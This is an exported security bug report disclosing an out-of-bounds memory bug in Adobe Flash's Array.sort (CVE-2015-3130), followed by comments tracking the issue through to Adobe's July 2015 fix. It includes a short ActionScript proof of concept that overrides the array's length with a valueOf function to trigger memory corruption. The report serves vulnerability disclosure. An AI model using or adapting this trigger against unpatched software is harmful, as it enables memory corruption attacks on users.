Adobe Flash: Array.sort can go out of bounds

[GoogleCodeExporter]

If the length of an array is overridden so that it returns a long length, and 
then later a short one, Array.sort can swap array elements that are out of 
bounds of the array in memory.

A PoC is as follows:

var s = 1;

var rec_array:Array = new Array();
rec_array.push({name: "john", city: "omaha", zip: 68144});
rec_array.push({name: "john", city: "kansas city", zip: 72345});
rec_array.push({name: "bob", city: "omaha", zip: 94010});

var n = {valueOf : gl};
rec_array.length = n;

rec_array.sortOn(["name", "city"]);
for(i=0; i<rec_array.length; i++){
    trace(rec_array[i].name + ", " + rec_array[i].city);
}

function gl(){

    trace(s);
        if(s< 3){
        s++;
        return 100000;
    }else{
        return 3;       
        }
    }

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 7 May 2015 at 8:57

Attachments:

• arraysort.swf
• arraysort.fla

[GoogleCodeExporter]

This is PSIRT-3659

Original comment by natashe...@google.com on 8 May 2015 at 6:43

[GoogleCodeExporter]

Original comment by cev...@google.com on 5 Jul 2015 at 6:32

• Added labels: CVE-2015-3130

[GoogleCodeExporter]

Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Original comment by cev...@google.com on 9 Jul 2015 at 12:37

• Changed state: Fixed
• Added labels: Fixed-2015-Jul-8

[GoogleCodeExporter]

Original comment by natashe...@google.com on 3 Aug 2015 at 9:43

• Removed labels: Restrict-View-Commit